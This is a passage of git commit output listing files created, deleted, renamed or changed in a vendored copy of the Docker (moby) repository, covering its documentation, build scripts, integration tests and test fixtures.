mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/container_prune.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/cp.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/create.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/deploy.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/diff.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/docker_images.gif delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/dockerd.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/events.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/exec.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/export.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/history.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/image_prune.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/images.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/import.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/index.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/info.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/inspect.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/kill.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/load.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/login.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/logout.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/logs.md delete mode 100644 
vendor/github.com/docker/docker/docs/reference/commandline/menu.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_connect.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_create.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/node_update.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/pause.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_create.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_disable.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_enable.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_inspect.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_install.md delete mode 100644 
vendor/github.com/docker/docker/docs/reference/commandline/plugin_ls.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_push.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_rm.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_set.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/plugin_upgrade.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/port.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/ps.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/pull.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/push.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/rename.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/restart.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/rm.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/rmi.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/run.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/save.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/search.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_create.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_inspect.md delete mode 100644 
vendor/github.com/docker/docker/docs/reference/commandline/service_logs.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_ls.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_ps.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_rm.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_scale.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/service_update.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_deploy.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_ls.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_ps.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_rm.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stack_services.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/start.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stats.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/stop.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md delete mode 100644 
vendor/github.com/docker/docker/docs/reference/commandline/system_df.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/tag.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/top.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/unpause.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/update.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/version.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_create.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_inspect.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_ls.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_prune.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/volume_rm.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/commandline/wait.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/glossary.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/index.md delete mode 100644 vendor/github.com/docker/docker/docs/reference/run.md delete mode 100644 vendor/github.com/docker/docker/docs/static_files/docker-logo-compressed.png create mode 100644 vendor/github.com/docker/docker/docs/static_files/moby-project-logo.png create mode 100644 vendor/github.com/docker/docker/errdefs/defs.go create mode 100644 vendor/github.com/docker/docker/errdefs/doc.go create mode 100644 vendor/github.com/docker/docker/errdefs/helpers.go create mode 100644 vendor/github.com/docker/docker/errdefs/helpers_test.go create mode 100644 vendor/github.com/docker/docker/errdefs/is.go delete mode 100644 vendor/github.com/docker/docker/experimental/README.md delete mode 
100644 vendor/github.com/docker/docker/experimental/checkpoint-restore.md delete mode 100644 vendor/github.com/docker/docker/experimental/docker-stacks-and-bundles.md delete mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan-l3.gliffy delete mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan-l3.png delete mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan-l3.svg delete mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.gliffy delete mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.png delete mode 100644 vendor/github.com/docker/docker/experimental/images/ipvlan_l2_simple.svg delete mode 100644 vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.gliffy delete mode 100644 vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.png delete mode 100644 vendor/github.com/docker/docker/experimental/images/macvlan-bridge-ipvlan-l2.svg delete mode 100644 vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.gliffy delete mode 100644 vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.png delete mode 100644 vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.svg delete mode 100644 vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy delete mode 100644 vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.png delete mode 100644 vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.svg delete mode 100644 vendor/github.com/docker/docker/experimental/vlan-networks.md delete mode 100644 vendor/github.com/docker/docker/hack/Jenkins/W2L/postbuild.sh delete mode 100644 vendor/github.com/docker/docker/hack/Jenkins/W2L/setup.sh delete mode 100644 vendor/github.com/docker/docker/hack/Jenkins/readme.md create mode 100644 vendor/github.com/docker/docker/hack/README.md create mode 100755 
vendor/github.com/docker/docker/hack/ci/arm create mode 100755 vendor/github.com/docker/docker/hack/ci/experimental create mode 100755 vendor/github.com/docker/docker/hack/ci/janky create mode 100755 vendor/github.com/docker/docker/hack/ci/powerpc create mode 100755 vendor/github.com/docker/docker/hack/ci/z delete mode 100755 vendor/github.com/docker/docker/hack/dockerfile/binaries-commits delete mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install-binaries.sh create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/containerd.installer create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/dockercli.installer create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/gometalinter.installer create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/install.sh create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/proxy.installer create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/runc.installer create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/tini.installer create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/tomlv.installer create mode 100755 vendor/github.com/docker/docker/hack/dockerfile/install/vndr.installer delete mode 100644 vendor/github.com/docker/docker/hack/install.sh create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/README.md create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/Dockerfile create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/call.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/master.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/master/set_test.go create mode 100644 
vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/types/types.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/vendor.conf create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/executor.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/agent/worker/worker.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/compose.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/dockercmd.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/enumerate_test.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/host.go create mode 100644 vendor/github.com/docker/docker/hack/integration-cli-on-swarm/host/volume.go delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/compat delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/control delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.bash-completion delete mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.default delete mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.init delete mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.docker.upstart delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.install delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.manpages delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.postinst delete mode 120000 vendor/github.com/docker/docker/hack/make/.build-deb/docker-engine.udev delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-deb/docs 
delete mode 100755 vendor/github.com/docker/docker/hack/make/.build-deb/rules delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine-selinux.spec delete mode 100644 vendor/github.com/docker/docker/hack/make/.build-rpm/docker-engine.spec delete mode 100644 vendor/github.com/docker/docker/hack/make/binary-client delete mode 100644 vendor/github.com/docker/docker/hack/make/build-deb mode change 100644 => 100755 vendor/github.com/docker/docker/hack/make/build-integration-test-binary delete mode 100644 vendor/github.com/docker/docker/hack/make/build-rpm delete mode 100755 vendor/github.com/docker/docker/hack/make/clean-apt-repo delete mode 100755 vendor/github.com/docker/docker/hack/make/clean-yum-repo delete mode 100644 vendor/github.com/docker/docker/hack/make/cover delete mode 100644 vendor/github.com/docker/docker/hack/make/dynbinary-client delete mode 100755 vendor/github.com/docker/docker/hack/make/generate-index-listing delete mode 100644 vendor/github.com/docker/docker/hack/make/install-binary-client delete mode 100644 vendor/github.com/docker/docker/hack/make/install-binary-daemon delete mode 100644 vendor/github.com/docker/docker/hack/make/install-script delete mode 100755 vendor/github.com/docker/docker/hack/make/release-deb delete mode 100755 vendor/github.com/docker/docker/hack/make/release-rpm delete mode 100755 vendor/github.com/docker/docker/hack/make/sign-repos delete mode 100755 vendor/github.com/docker/docker/hack/make/test-deb-install delete mode 100755 vendor/github.com/docker/docker/hack/make/test-install-script create mode 100755 vendor/github.com/docker/docker/hack/make/test-integration delete mode 100755 vendor/github.com/docker/docker/hack/make/test-old-apt-repo delete mode 100644 vendor/github.com/docker/docker/hack/make/test-unit delete mode 100644 vendor/github.com/docker/docker/hack/make/tgz delete mode 100644 vendor/github.com/docker/docker/hack/make/ubuntu delete mode 100755 
vendor/github.com/docker/docker/hack/make/update-apt-repo delete mode 100644 vendor/github.com/docker/docker/hack/make/win delete mode 100755 vendor/github.com/docker/docker/hack/release.sh create mode 100755 vendor/github.com/docker/docker/hack/test/e2e-run.sh create mode 100755 vendor/github.com/docker/docker/hack/test/unit create mode 100755 vendor/github.com/docker/docker/hack/validate/changelog-date-descending create mode 100755 vendor/github.com/docker/docker/hack/validate/changelog-well-formed delete mode 100755 vendor/github.com/docker/docker/hack/validate/compose-bindata create mode 100755 vendor/github.com/docker/docker/hack/validate/deprecate-integration-cli delete mode 100755 vendor/github.com/docker/docker/hack/validate/gofmt create mode 100755 vendor/github.com/docker/docker/hack/validate/gometalinter create mode 100644 vendor/github.com/docker/docker/hack/validate/gometalinter.json delete mode 100755 vendor/github.com/docker/docker/hack/validate/lint delete mode 100755 vendor/github.com/docker/docker/hack/validate/vet rename vendor/github.com/docker/docker/{daemon => image/cache}/cache.go (72%) rename vendor/github.com/docker/docker/{runconfig => image/cache}/compare.go (82%) rename vendor/github.com/docker/docker/{runconfig => image/cache}/compare_test.go (68%) create mode 100644 vendor/github.com/docker/docker/image/spec/README.md rename vendor/github.com/docker/docker/{pkg/integration => integration-cli}/checker/checker.go (95%) create mode 100644 vendor/github.com/docker/docker/integration-cli/cli/build/build.go create mode 100644 vendor/github.com/docker/docker/integration-cli/cli/cli.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/daemon.go create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon/daemon.go create mode 100644 vendor/github.com/docker/docker/integration-cli/daemon/daemon_swarm.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_swarm.go rename 
vendor/github.com/docker/docker/integration-cli/{daemon_swarm_hack.go => daemon_swarm_hack_test.go} (77%) delete mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_unix.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/daemon_windows.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_auth_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_build_windows_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_containers_windows_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_events_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_info_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_inspect_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_ipcmode_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_resize_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_service_update_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_stats_unix_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_swarm_node_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_swarm_service_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_update_unix_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_version_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_api_volumes_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_authz_plugin_v2_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_authz_unix_test.go create mode 100644 
vendor/github.com/docker/docker/integration-cli/docker_cli_config_create_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go rename vendor/github.com/docker/docker/integration-cli/{docker_cli_cp_utils.go => docker_cli_cp_utils_test.go} (76%) delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_diff_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_experimental_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_kill_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_links_unix_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_nat_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_oom_killed_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_pause_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_plugins_logdriver_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_pull_trusted_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_rename_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_rm_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_stop_test.go delete mode 100644 
vendor/github.com/docker/docker/integration-cli/docker_cli_tag_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_update_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_cli_version_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_experimental_network_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_test_vars.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/docker_utils.go create mode 100644 vendor/github.com/docker/docker/integration-cli/docker_utils_test.go create mode 100644 vendor/github.com/docker/docker/integration-cli/environment/environment.go rename vendor/github.com/docker/docker/integration-cli/{events_utils.go => events_utils_test.go} (98%) delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/deploy/default.yaml delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/deploy/remove.yaml delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/deploy/secrets.yaml mode change 100644 => 120000 vendor/github.com/docker/docker/integration-cli/fixtures/https/ca.pem mode change 100644 => 120000 vendor/github.com/docker/docker/integration-cli/fixtures/https/client-cert.pem mode change 100644 => 120000 vendor/github.com/docker/docker/integration-cli/fixtures/https/client-key.pem mode change 100644 => 120000 vendor/github.com/docker/docker/integration-cli/fixtures/https/server-cert.pem mode change 100644 => 120000 vendor/github.com/docker/docker/integration-cli/fixtures/https/server-key.pem delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.crt delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey1.key delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.crt 
delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey2.key delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.crt delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey3.key delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.crt delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/delgkey4.key delete mode 100755 vendor/github.com/docker/docker/integration-cli/fixtures/notary/gen.sh delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.cert delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/notary/localhost.key delete mode 100644 vendor/github.com/docker/docker/integration-cli/fixtures/secrets/default rename vendor/github.com/docker/docker/integration-cli/{fixtures_linux_daemon.go => fixtures_linux_daemon_test.go} (79%) delete mode 100644 vendor/github.com/docker/docker/integration-cli/registry.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/registry_mock.go create mode 100644 vendor/github.com/docker/docker/integration-cli/requirement/requirement.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/requirements.go create mode 100644 vendor/github.com/docker/docker/integration-cli/requirements_test.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/requirements_unix.go create mode 100644 vendor/github.com/docker/docker/integration-cli/requirements_unix_test.go rename vendor/github.com/docker/docker/integration-cli/{test_vars_exec.go => test_vars_exec_test.go} (100%) rename vendor/github.com/docker/docker/integration-cli/{test_vars_noexec.go => test_vars_noexec_test.go} (100%) rename vendor/github.com/docker/docker/integration-cli/{test_vars_noseccomp.go => test_vars_noseccomp_test.go} (100%) rename 
vendor/github.com/docker/docker/integration-cli/{test_vars_seccomp.go => test_vars_seccomp_test.go} (100%) rename vendor/github.com/docker/docker/integration-cli/{test_vars.go => test_vars_test.go} (90%) rename vendor/github.com/docker/docker/integration-cli/{test_vars_unix.go => test_vars_unix_test.go} (100%) rename vendor/github.com/docker/docker/integration-cli/{test_vars_windows.go => test_vars_windows_test.go} (100%) rename vendor/github.com/docker/docker/integration-cli/{fixtures/load => testdata}/emptyLayer.tar (100%) delete mode 100644 vendor/github.com/docker/docker/integration-cli/trust_server.go delete mode 100644 vendor/github.com/docker/docker/integration-cli/utils.go create mode 100644 vendor/github.com/docker/docker/integration-cli/utils_test.go create mode 100644 vendor/github.com/docker/docker/integration/build/build_session_test.go create mode 100644 vendor/github.com/docker/docker/integration/build/build_squash_test.go create mode 100644 vendor/github.com/docker/docker/integration/build/build_test.go create mode 100644 vendor/github.com/docker/docker/integration/build/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/config/config_test.go create mode 100644 vendor/github.com/docker/docker/integration/config/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/copy_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/create_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/daemon_linux_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/diff_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/exec_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/export_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/health_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/inspect_test.go create 
mode 100644 vendor/github.com/docker/docker/integration/container/kill_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/links_linux_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/logs_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/mounts_linux_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/nat_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/pause_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/ps_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/remove_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/rename_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/resize_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/restart_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/stats_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/stop_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/update_linux_test.go create mode 100644 vendor/github.com/docker/docker/integration/container/update_test.go create mode 100644 vendor/github.com/docker/docker/integration/doc.go create mode 100644 vendor/github.com/docker/docker/integration/image/commit_test.go create mode 100644 vendor/github.com/docker/docker/integration/image/import_test.go create mode 100644 vendor/github.com/docker/docker/integration/image/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/image/remove_test.go create mode 100644 vendor/github.com/docker/docker/integration/image/tag_test.go create mode 100644 vendor/github.com/docker/docker/integration/internal/container/container.go create mode 
100644 vendor/github.com/docker/docker/integration/internal/container/exec.go create mode 100644 vendor/github.com/docker/docker/integration/internal/container/ops.go create mode 100644 vendor/github.com/docker/docker/integration/internal/container/states.go create mode 100644 vendor/github.com/docker/docker/integration/internal/network/network.go create mode 100644 vendor/github.com/docker/docker/integration/internal/network/ops.go create mode 100644 vendor/github.com/docker/docker/integration/internal/requirement/requirement.go create mode 100644 vendor/github.com/docker/docker/integration/internal/swarm/service.go create mode 100644 vendor/github.com/docker/docker/integration/network/delete_test.go create mode 100644 vendor/github.com/docker/docker/integration/network/helpers.go create mode 100644 vendor/github.com/docker/docker/integration/network/inspect_test.go create mode 100644 vendor/github.com/docker/docker/integration/network/ipvlan/ipvlan_test.go create mode 100644 vendor/github.com/docker/docker/integration/network/ipvlan/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/network/macvlan/macvlan_test.go create mode 100644 vendor/github.com/docker/docker/integration/network/macvlan/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/network/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/network/service_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/authz/authz_plugin_v2_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/authz/main_test.go rename vendor/github.com/docker/docker/{integration-cli/docker_cli_external_graphdriver_unix_test.go => integration/plugin/graphdriver/external_test.go} (50%) create mode 100644 vendor/github.com/docker/docker/integration/plugin/graphdriver/main_test.go create mode 100644 
vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/cmd/close_on_start/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/cmd/cmd_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/cmd/dummy/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/helpers_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/logging_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/logging/validation_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/pkg_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/volumes/cmd/cmd_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/volumes/cmd/dummy/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/volumes/helpers_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/volumes/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/plugin/volumes/mounts_test.go create mode 100644 vendor/github.com/docker/docker/integration/secret/main_test.go create mode 100644 vendor/github.com/docker/docker/integration/secret/secret_test.go create mode 100644 vendor/github.com/docker/docker/integration/service/create_test.go create mode 100644 vendor/github.com/docker/docker/integration/service/inspect_test.go create mode 100644 vendor/github.com/docker/docker/integration/service/main_test.go create mode 100644 
